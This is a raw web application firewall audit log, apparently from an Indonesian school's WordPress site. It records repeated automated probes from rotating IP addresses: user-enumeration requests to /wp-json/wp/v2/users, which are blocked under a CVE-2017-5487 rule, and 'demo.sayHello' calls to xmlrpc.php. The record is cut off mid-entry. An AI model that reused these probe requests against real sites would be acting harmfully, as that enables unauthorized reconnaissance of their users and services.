103.236.140.4 43732 103.236.140.4 8181 --c5861f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5861f0b-C-- demo.sayHello --c5861f0b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5861f0b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676828474504 5759 (- - -) Stopwatch2: 1746676828474504 5759; combined=4219, p1=512, p2=3482, p3=29, p4=30, p5=97, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5861f0b-Z-- --3fbb9e05-A-- [08/May/2025:11:00:29 +0700] aBwsXacs1DvJ_HgMHE_yGQAAAA4 103.236.140.4 43736 103.236.140.4 8181 --3fbb9e05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fbb9e05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fbb9e05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676829534268 2919 (- - -) Stopwatch2: 1746676829534268 2919; combined=1280, p1=430, p2=820, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fbb9e05-Z-- --52958b14-A-- [08/May/2025:11:00:30 +0700] aBwsXqcs1DvJ_HgMHE_yGgAAAA0 103.236.140.4 43738 103.236.140.4 8181 --52958b14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52958b14-C-- demo.sayHello --52958b14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52958b14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676830121575 7099 (- - -) Stopwatch2: 1746676830121575 7099; combined=5375, p1=700, p2=4463, p3=25, p4=24, p5=95, sr=97, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52958b14-Z-- --17b73f61-A-- [08/May/2025:11:00:31 +0700] aBwsX6cs1DvJ_HgMHE_yHgAAABM 103.236.140.4 43746 103.236.140.4 8181 --17b73f61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17b73f61-C-- demo.sayHello --17b73f61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17b73f61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676831598347 4608 (- - -) Stopwatch2: 1746676831598347 4608; combined=3548, p1=434, p2=2919, p3=22, p4=23, p5=88, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17b73f61-Z-- --aacc1339-A-- [08/May/2025:11:00:37 +0700] aBwsZacs1DvJ_HgMHE_yIAAAABY 103.236.140.4 43750 103.236.140.4 8181 --aacc1339-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aacc1339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aacc1339-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676837969475 2372 (- - -) Stopwatch2: 1746676837969475 2372; combined=1101, p1=338, p2=736, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aacc1339-Z-- --1ad60e62-A-- [08/May/2025:11:00:42 +0700] aBwsaqcs1DvJ_HgMHE_yIgAAABI 103.236.140.4 43754 103.236.140.4 8181 --1ad60e62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad60e62-C-- demo.sayHello --1ad60e62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad60e62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676842042925 4802 (- - -) Stopwatch2: 1746676842042925 4802; combined=3759, p1=471, p2=3072, p3=32, p4=25, p5=94, sr=68, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad60e62-Z-- --c9c08e27-A-- [08/May/2025:11:00:51 +0700] aBwsc8P9GxxPAbCroFbNCQAAAEY 103.236.140.4 43766 103.236.140.4 8181 --c9c08e27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9c08e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9c08e27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676851149517 3207 (- - -) Stopwatch2: 1746676851149517 3207; combined=1309, p1=459, p2=819, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9c08e27-Z-- --3f800b2b-A-- [08/May/2025:11:00:53 +0700] aBwsdcP9GxxPAbCroFbNCwAAAFc 103.236.140.4 43770 103.236.140.4 8181 --3f800b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f800b2b-C-- demo.sayHello --3f800b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f800b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676853805330 6795 (- - -) Stopwatch2: 1746676853805330 6795; combined=4824, p1=610, p2=3957, p3=38, p4=43, p5=103, sr=80, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f800b2b-Z-- --845a4864-A-- [08/May/2025:11:00:57 +0700] aBwseY4K347NtBcwXKwGVwAAAIg 103.236.140.4 43776 103.236.140.4 8181 --845a4864-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --845a4864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --845a4864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676857060333 2170 (- - -) Stopwatch2: 1746676857060333 2170; combined=952, p1=335, p2=590, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845a4864-Z-- --b002647b-A-- [08/May/2025:11:01:01 +0700] aBwsfcP9GxxPAbCroFbNDwAAAFg 103.236.140.4 43780 103.236.140.4 8181 --b002647b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b002647b-C-- demo.sayHello --b002647b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b002647b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676861139236 4535 (- - -) Stopwatch2: 1746676861139236 4535; combined=3492, p1=425, p2=2870, p3=22, p4=24, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b002647b-Z-- --1e073657-A-- [08/May/2025:11:01:12 +0700] aBwsiKcs1DvJ_HgMHE_yIwAAABE 103.236.140.4 43784 103.236.140.4 8181 --1e073657-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e073657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e073657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676872425913 2678 (- - -) Stopwatch2: 1746676872425913 2678; combined=1206, p1=431, p2=744, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e073657-Z-- --bda22023-A-- [08/May/2025:11:01:21 +0700] aBwskacs1DvJ_HgMHE_yJAAAAAQ 103.236.140.4 43786 103.236.140.4 8181 --bda22023-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bda22023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bda22023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676881427992 3337 (- - -) Stopwatch2: 1746676881427992 3337; combined=1463, p1=511, p2=918, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bda22023-Z-- --3b6a9d06-A-- [08/May/2025:11:01:23 +0700] aBwsk6cs1DvJ_HgMHE_yJgAAABg 103.236.140.4 43790 103.236.140.4 8181 --3b6a9d06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b6a9d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b6a9d06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676883578707 3110 (- - -) Stopwatch2: 1746676883578707 3110; combined=1300, p1=445, p2=825, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b6a9d06-Z-- --46beeb64-A-- [08/May/2025:11:01:25 +0700] aBwslcP9GxxPAbCroFbNEAAAAFQ 103.236.140.4 43792 103.236.140.4 8181 --46beeb64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46beeb64-C-- demo.sayHello --46beeb64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46beeb64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676885040984 5441 (- - -) Stopwatch2: 1746676885040984 5441; combined=4128, p1=472, p2=3430, p3=31, p4=34, p5=93, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46beeb64-Z-- --b6957570-A-- [08/May/2025:11:01:26 +0700] aBwslqcs1DvJ_HgMHE_yKAAAAAU 103.236.140.4 43798 103.236.140.4 8181 --b6957570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b6957570-C-- demo.sayHello --b6957570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6957570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676886789010 4170 (- - -) Stopwatch2: 1746676886789010 4170; combined=3186, p1=393, p2=2615, p3=19, p4=21, p5=80, sr=58, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6957570-Z-- --40c9a942-A-- [08/May/2025:11:01:41 +0700] aBwspacs1DvJ_HgMHE_yKgAAAAM 103.236.140.4 43802 103.236.140.4 8181 --40c9a942-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40c9a942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c9a942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676901129947 3526 (- - -) Stopwatch2: 1746676901129947 3526; combined=1522, p1=499, p2=986, p3=0, p4=0, p5=36, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c9a942-Z-- --03ecf206-A-- [08/May/2025:11:01:45 +0700] aBwsqcP9GxxPAbCroFbNEwAAAEM 103.236.140.4 43806 103.236.140.4 8181 --03ecf206-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03ecf206-C-- demo.sayHello --03ecf206-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03ecf206-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676905129973 6262 (- - -) Stopwatch2: 1746676905129973 6262; combined=4592, p1=598, 